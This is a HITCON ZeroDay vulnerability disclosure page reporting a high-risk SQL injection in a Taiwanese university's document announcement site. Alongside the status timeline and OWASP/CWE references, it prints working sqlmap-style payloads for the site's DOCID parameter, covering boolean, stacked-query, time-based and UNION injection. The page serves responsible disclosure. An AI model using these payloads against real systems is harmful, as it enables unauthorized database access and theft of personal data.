Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2020-00889
- 發信 Vendor: 國立臺中教育大學
- Title: 國立臺中教育大學 存在 SQL Injection 漏洞
- Introduction: 存在 SQL Injection 漏洞
處理狀態
目前狀態
公開
Last Update : 2020/11/27
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2020/10/16 10:33:41 : 新提交 (由 WoodMan 更新此狀態)
- 2020/10/16 10:36:09 : 新提交 (由 WoodMan 更新此狀態)
- 2020/10/18 23:12:23 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/10/19 12:25:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/10/19 12:25:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/10/19 12:25:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/11/09 18:10:03 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/11/27 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2020-00889
- 通報者:Project0 (WoodMan)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://edoc2.ntcu.edu.tw/announce/outside/content.asp?DOCID=2721
https://edoc2.ntcu.edu.tw/announce/outside/content.asp?DOCID=2721'
https://edoc2.ntcu.edu.tw/announce/outside/content.asp?DOCID=2721'
敘述
Parameter: DOCID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: DOCID=2721 AND 9190=9190
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: DOCID=2721;WAITFOR DELAY '0:0:5'--
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: DOCID=2721 WAITFOR DELAY '0:0:5'
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: DOCID=-6701 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(81)+CHAR(107)+CHAR(73)+CHAR(119)+CHAR(113)+CHAR(121)+CHAR(121)+CHAR(116)+CHAR(121)+CHAR(104)+CHAR(88)+CHAR(66)+CHAR(86)+CHAR(72)+CHAR(105)+CHAR(109)+CHAR(100)+CHAR(111)+CHAR(102)+CHAR(106)+CHAR(79)+CHAR(108)+CHAR(69)+CHAR(69)+CHAR(85)+CHAR(114)+CHAR(104)+CHAR(107)+CHAR(82)+CHAR(88)+CHAR(87)+CHAR(85)+CHAR(103)+CHAR(118)+CHAR(83)+CHAR(105)+CHAR(97)+CHAR(66)+CHAR(110)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ALtz聲明:單純作學習、練習、測試、研究;並無惡意、深入破壞。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。